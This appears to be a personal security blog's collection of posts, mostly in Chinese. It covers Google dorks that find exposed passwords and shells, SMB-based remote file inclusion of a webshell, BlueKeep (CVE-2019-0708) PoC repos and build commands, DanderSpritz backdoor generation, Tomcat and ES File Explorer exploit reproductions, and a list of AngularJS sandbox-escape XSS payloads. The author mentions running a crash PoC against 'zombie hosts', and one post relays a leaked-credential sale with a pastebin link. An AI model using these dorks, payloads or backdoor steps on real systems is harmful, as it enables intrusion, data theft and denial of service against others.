google hacking note

0x00 Grammar inurl/allinurl site intext/allintext intitle/alintitle filetype: cache info link   related phonebook   inanchor daterange define     + – ~ . * “”   0x01 Example intitle:”php shell*” “Enable stderr” filetype:php intitle:”index of” master.passwd Intext:to parent directory+intext:.mdb   filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword” filetype:inc dbconn   inurl:aspx|jsp|php|asp inurl:”viewerframe?mode=”   inurl:top.htm inurl:currenttime   0x02 Defense 1. robots.txt 2. http://www.google.com/remove.html 3. if(strstr($_SERVER[‘HTTP_USER_AGENT’],”Googlebot”)) { header(“HTTP/1.1301”); header(“Location:http://www.google.com”); } ?> 4. noarchive 5. nosnipet   0x03 Tools https://www.exploit-db.com/google-hacking-database https://pentest-tools.com/information-gathering/google-hacking   0x04 Reference https://blog.csdn.net/MickeyMouse1928/article/details/68066505 https://zhuanlan.zhihu.com/p/25295436   0x05 more examples all from internet intitle:index.of “Apache/1.3.27 Server at” intitle:index.of index.php.bak inurl:index.php.bak filetype:conf inurl:firewall inurl:conf OR inurl:config OR inurl:cfg filetype:log username putty filetype:xls username password email intitle:login intext:版权信息 filetype:sql sql filetype:mdb inurl:com allinurl:winnt/system32/ allinurl:wwwboard/passwd.txt inurl:.bash_history inurl:config.txt inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl:passwd filetype:txt inurl:iisadmin allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php allinurl:/phpinfo.php allinurl:/privmsg.php inurl:auth_user_file.txt inurl:orders.txt inurl:”wwwroot/*.” inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php inurl:gov filetype:xls “restricted” index of ftp +.mdb allinurl:/cgi-bin/ +mailto intitle:”php shell*” “Enable stderr” filetype:php allintitle:”index of /admin inurl:jira AND intitle:login AND inurl:[company_name] inurl:https://trello.com AND intext:@gmail.com AND intext:password inurl:https://trello.com AND intext:ftp AND……

利用smb绕过双off进行RFI

0x00 概述 前段时间看到这篇文章,感觉有点意思,特此重现。 0x01 重现 先off 尝试远程包含phpinfo http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=http://192.168.138.129/x.php 搭建smb服务器 apt-get install samba mkdir /var/www/html/pub/ chmod 0555 /var/www/html/pub/ chown -R nobody:nogroup /var/www/html/pub/ echo > /etc/samba/smb.conf 写入 [global] workgroup = WORKGROUP server string = Samba Server %v netbios name = indishell-lab security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes ​ [ethan] path = /var/www/html/pub writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody 配置匿名可访问smb service smbd restart 成功包含Phpinfo和一句话木马 http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=\\192.168.138.129\ethan\x.php http://192.168.43.237:8888/lsawebtest/misc/smbrfi/getfile.php?filename=\\192.168.138.129\ethan\xxxxx.php 0x02 结语 本人未测试外网smb和非windows服务器,根据网上别人的测试,这种方法只对windows php服务器(默认有smb客户端,UNC特性\\)有效,linux服务器可能需要安装smb客户端或者不支持UNC(默认不支持smb);外网smb无效,可能是运营商禁了445,还是有点鸡肋……

RDP RCE(CVE-2019-0708)集锦

//Really DO Patch ^_^ 0x00 概述 20190514,微软发布补丁,修复了一个严重的漏洞-rdp远程代码执行。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。   0x01影响范围 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows Server 2003 Windows XP   0x02 漏洞重现 poc已出,重现几个网上主流的poc: 1)360的0708detector.exe(无损扫描工具) //感觉不是很稳定,对同个ip有时成功有时不成功…… 一些根据此工具写的批量 https://github.com/biggerwing/CVE-2019-0708-poc https://github.com/autoing/CVE-2019-0708-POC   2)https://github.com/zerosum0x0/CVE-2019-0708 包含了msf的rb git clone https://github.com/zerosum0x0/CVE-2019-0708.git cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/ ./bootstrap ./configure –disable-credssp –disable-smartcard make ./rdesktop 192.168.1.7:3389 可能要apt-get install libssl1.0.0 libssl-dev 用scan_with_docker.py可以批量 //较稳定   3)https://github.com/Ekultek/BlueKeep.git 可以批量 先安装impacket https://github.com/SecureAuthCorp/impacket pip install -r requestments.txt pip install . vim bluekeep_poc.py 删除重复的一个impacket   4)https://github.com/robertdavidgraham/rdpscan 可批量 //较不稳定   5)https://github.com/Leoid/CVE-2019-0708 pip3 install impacket 6)https://github.com/n1xbyte/CVE-2019-0708 //20190531新增蓝屏poc,用03standx86测试出现 OpenSSL.SSL.SysCallError: (104, ‘ECONNRESET’) 应该是这个03系统问题 直接找几个僵尸主机测一测 //效果不错! 7)https://github.com/closethe/CVE-2019-0708-POC 试了几个都是timed out,可能是poc未完善…… 其他一些poc(未测试): https://github.com/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path https://github.com/blacksunwen/CVE-2019-0708(和5基本一样) https://github.com/Jaky5155/cve-2019-0708-exp https://github.com/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status https://github.com/trickster0/CVE-2019-0708 https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit(powershell)   截至发文(20190605),尚未发现公开可用exp,拭目以待! 360的某大神已搞出exp,能在win7 x64弹框了,未公开。   20190606,发现msf可获取meterpreter的exp,未公开。 https://twitter.com/zerosum0x0/status/1135866953996820480   /* 还有一堆假exp,利用ms12-020、os.system()、alert、假GUI、骗star等等。 www.cve-2019-0708.com(20190529无法访问了)据说是假的! */   0x03 漏洞分析   rdp基础 RDP 协议基于 T.128(T.120 协议族)提供多通道通信,并进行了拓展。 远程桌面协议(RDP)支持客户端建立点到点的连接,并定义了通信双方在虚拟通道间的数据通信方式,。这种虚拟通道为双向数据通道,可以扩展RDP的功能。Windows Server 2000在RDP v5.1中定义了32种静态虚拟通道(SVC),但是因为将来要定义的动态虚拟通道数量的限制,因此专用的通道svc数量受到一定限制。SVC是在会话开始时创建的,并在会话终止前保持不变,但DVC不同,因为它是根据用户需求来创建和删除的。 服务端在初始化阶段,会创建MS_T120, Index 为 31 的通道。在收到MCS Connect Initial数据封包后进行通道创建和绑定操作。 在IcaBindVirtualChannels函数中进行绑定时,IcaFindChannelByName函数只根据通道名进行通道查找。当通道名为MS_T120(不区分大小写)时,会找到系统内部通道 MS_T120的通道并与之绑定,绑定后,通道索引会即被更改为新的通道索引。 参考mcafee,seebug   本人用win7sp1 x64进行测试 查看termdd.sys,有修改 对比补丁前后 13628这个子模块变化比较大,先看看 发现加了stricmp比较,和ms_t120这个通道比较,为0就用写死的v19即31(rdp通道编号)作为第三个参数传入13ec8这个子模块,所以这里可以看出漏洞点应该是ms_t120这个通道,是就触发漏洞。 //bindiff没解析出_IcaBindChannel和_IcaBindVirtualChannels。 在安全机制启用前,系统初始化了RDP连接序列,并完成通道的建立,这导致了该漏洞可形成蠕虫。 在rdp的gcc协商初始化序列中,ms_t120这个svc会被绑定作为引用通道31。 这个通道编号31在microsoft内部使用,在客户端请求连接中不会出现ms_t120这个svc。 但是在GCC协商初始化的过程中,客户端提供的通道名称并不在服务器端的白名单中,这意味着攻击者将能够设置另一个名为“MS_T120”的不在编号31的SVC通道,这导致目标系统发生堆内存崩溃并实现远程代码执行。 MS_T120引用通道会在rdpwsx.dll中创建,堆内存也会在rdpwp.sys中分配内存池。当MS_T120引用通道在通道编号非31的场景下建立时,便会发生堆内存崩溃。 微软在termdd.sys的_IcaBindVirtualChannels和_IcaRebindVirtualChannels两个函数中为客户端的连接请求部分添加了针对通道名称“MS_T120”的检查代码,来保证ms_t120是和通道31进行绑定。   利用wireshark获取rdp数据包(winn2003stand without 0708 patch) 正常rdp连接: tcp三次握手后发送rdp数据,利用decode as tpkt解出rdp数据包 //第二遍tcp握手后(neg req=fff)才开始发clientdata 没有ms_t120通道信息     利用360无损检查工具发送的数据包(neg req=fff) 此处本人推测ms_t120通道编号是1,channelCount就是channelDefArray元素数,验证漏洞存在! 利用./rdesktop(第二个poc)对某僵尸主机发送的数据包: 此时推测ms_t120通道编号为2,验证漏洞存在! 利用蓝屏crashpoc.py对某僵尸主机发送的数据包: 本人才疏学浅,对rdp不甚了解,只能从浅层大概分析,高手可参考相关分析资料。 相关分析资料: 英文: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/(推荐) https://medium.com/@straightblast426/a-debugging-primer-with-cve-2019-0708-ccfa266682f6 https://wazehell.io/2019/05/22/cve-2019-0708-technical-analysis-rdp-rce/ https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html……

Danderspritz体验

前段时间需要一款支持正向连接的远控,试试danderspritz,还不错。 这是NSA泄露的工具中的一款远控,类似msf。 https://github.com/3gstudent/fuzzbunch(推荐!避免出现奇奇怪怪的错误) or https://github.com/fuzzbunch/fuzzbunch java -jar start.jar 日志命名格式:C:\logs\xxx!!!!!否则报错 pc_prep 按需求生成后门 这里选25 Pick the payload type 25 Update advanced settings NO Listen AT ALL TIMES? YES Allow triggering via a raw socket? YES Allow fallback to promiscuous mode on that raw socket? NO Disable comms between PC and driver? NO Allow triggering via port knocking? NO Enter the PC ID [0] Change LISTEN PORTS? NO – Pick a key –   0) Exit –   1) Create a new key –   2) Default Enter the desired option 2 – Configuration: – – <?xml version=’1.0′ encoding=’UTF-8′ ?> – <PCConfig> –   <Flags> –     <PCHEAP_CONFIG_FLAG_24_HOUR/> –     <PCHEAP_CONFIG_FLAG_RAW_SOCKET_TRIGGER/> –   </Flags> –   <Id>0x0</Id> – </PCConfig> – Is this configuration valid YES Do you want to configure with FC? NO – Configured binary at: –   C:\logs\0\z0.0.0.1/Payloads/PeddleCheap_2019_04_25_13h32m34s.934/PC_Level4_exe.configured 正向连接后门 成功连接后会加载模块收集目标信息 help/aliases获取帮助   参考资料 https://www.anquanke.com/post/id/85907 https://github.com/3gstudent/3gstudent.github.io/blob/master/_posts/2017-4-26-NSA%20DanderSpiritz%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97%E2%80%94%E2%80%94%E6%9C%A8%E9%A9%AC%E7%94%9F%E6%88%90%E4%B8%8E%E6%B5%8B%E8%AF%95.md  

tomcat rce漏洞重现(cve-2019-0232)

0x00 概述 2019.4,网上曝出出tomcat rce漏洞(cve-2019-0232),该漏洞是由于Tomcat CGI(jre)将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入,本文对此漏洞进行重现。 0x01 影响范围 Apache Tomcat 9.0.0.M1 to 9.0.17 Apache Tomcat 8.5.0 to 8.5.39 Apache Tomcat 7.0.0 to 7.0.93   0x02 漏洞重现 环境 tomcat 8.5.39/9.0.12+java 8u171 conf/web.xml 注意要去掉注释!!! 第六行web-inf/cgi-bin!!!(默认是web-inf/cgi,涉及访问路径) conf/context.xml Context 添加privileged=”true” 编写bat文件 重现成功! whoami和net user都空白,应该是权限不足。   0x03 结语 好鸡肋的漏洞,不仅要修改默认配置,还要传bat……(理论型漏洞如12615)   0x04 修复方案 升级到v9.0.19(增加了校验命令行参数) 不要乱改配置(除非你知道自己在干嘛……)   0x05 参考资料 https://xz.aliyun.com/t/4875 http://26.wf/?p=375

ES文件浏览器漏洞重现及分析(cve-2019-6447)

0x00 概述 2019年1月,es文件浏览器爆出漏洞,启动时监听了59777端口,并且不关闭,可以接受json数据,攻击者可以构造payload读取手机文件或者远程运行手机程序。 影响范围: <=4.1.9.7.4 利用条件: 需要和受害者在同一网络下,如wifi。 0x01 漏洞重现 环境:雷电模拟器+es4.1.9.4 开启es文件浏览器,发现监听了ipv6 59777端口 启动poc探测 启动微信   0x02 漏洞分析 解包apk 将classes.dex和classes2.dex转为jar再打开 代码经过混淆 根据poc先看看调用的命令在哪里,在classes2.dex2jar.jar中搜索command listFiles命令调用的函数 appLaunch命令调用函数 appPull调用函数 listAppa等列举app的命令调用函数:a(int i) //i==0,1,2,3,4 接着看看开启59777端口的http服务的地方   代码看得挺辛苦,感谢网上各路大神的总结。      

bilibili background source code leakage

2019 4 22 afternoon,an id named openbilibili upload a project to github,which named go-common,that is likely to bilibili.com’s background source code. In the source code,we can find some sensitive information: And some funny things: So,as a enterprise,should pay attention to github leakage and monitor github by some tools so that can get information in no time when assets leaked. That is a big bomb for data leakage!

client side template injection with angulajs cause xss

I often meet angulajs when I test website,so I want to make a note. <html ng-app> <head> <script src=”./angular.js”></script> </head> <body> <p> <?php $q = $_GET[‘q’];   //echo $q;   echo htmlspecialchars($q, ENT_QUOTES); ?> </p> </body> </html>   POC {{$id}} or {{1+1}} POC: http://127.0.0.1:8999/lsawebtest/vulenv/misc/angular-xss/test.php?q={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1}%20}%20};alert(0)//%27);}} //If you are interested in it,you can research how to bypass the sandbox.   Tow cases: https://www.freebuf.com/vuls/125932.html http://www.secevery.com:4321/bugs/wooyun-2016-0190247   List of Sandbox bypasses from portswigger 1.0.1 – 1.1.5 Mario Heiderich (Cure53) {{constructor.constructor(‘alert(1)’)()}}   1.2.0 – 1.2.1 Jan Horn (Google) {{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}   1.2.2 – 1.2.5 Gareth Heyes (PortSwigger) {{‘a'[{toString:[].join,length:1,0:’__proto__’}].charAt=”.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”‘”);}}   1.2.6 – 1.2.18 Jan Horn (Google) {{(_=”.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}   1.2.19 – 1.2.23 Mathias Karlsson {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}   1.2.24 – 1.2.29 Gareth Heyes (PortSwigger) {{‘a’.constructor.prototype.charAt=”.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”‘”);}}   1.3.0 Gábor Molnár (Google) {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (”+”.toString( ‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’ )) );}}   1.3.1 – 1.3.2 Gareth Heyes (PortSwigger) {{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=”.valueOf; $eval(‘x=alert(1)//’); }}   1.3.3 – 1.3.18……

159 million clients leaked from linkedin

January 30th 2019,hacker “andrew” release some data through the pastebin web,It seems that linkedIn’s database was hacked,and 159 million clients data was leaked,include email and password(plain).The hacker has released a sample list of 100 clients along with their account login credentials as “proof of concept”. The hacker sell the database for $99,also if you want to hack the individual accounts of any person,you can pay for a small fee of 0.012 Bitcoin. And the hacker also sell databases of 200 websites($20-$150). https://pastebin.com/x9ECRdis Finally,I suggest all linkedin’s user should change password in no time!

phpstorm+phpstudy+xdebug配置

环境win7+phpstorm2018.3+phpstudy2016+php5.6.27-nts+apache   1. phpstudy开启xdebug扩展   2.修改php.ini: 结尾添加: [XDebug] xdebug.profiler_output_dir=”D:\phpStudy\tmp\xdebug” xdebug.trace_output_dir=”D:\phpStudy\tmp\xdebug” zend_extension=”D:\phpStudy\php\php-5.6.27-nts\ext\php_xdebug.dll”   xdebug.profiler_append = 0 xdebug.profiler_enable = 1 xdebug.profiler_enable_trigger = 0 xdebug.profiler_output_name = “cache.out.%t-%s” xdebug.remote_enable = 1 xdebug.remote_handler = “dbgp” xdebug.remote_mode = “req” xdebug.remote_host = “127.0.0.1” xdebug.remote_port = 9010 xdebug.idekey= PHPSTROM     phpstorm配置与phpstudy同步:    //如果只在phpstudy里面打开项目或者开发就填phpstudy路径就ok      3. 配置xdebug         4. 安装并开启浏览器插件xdebug helper   5. 调试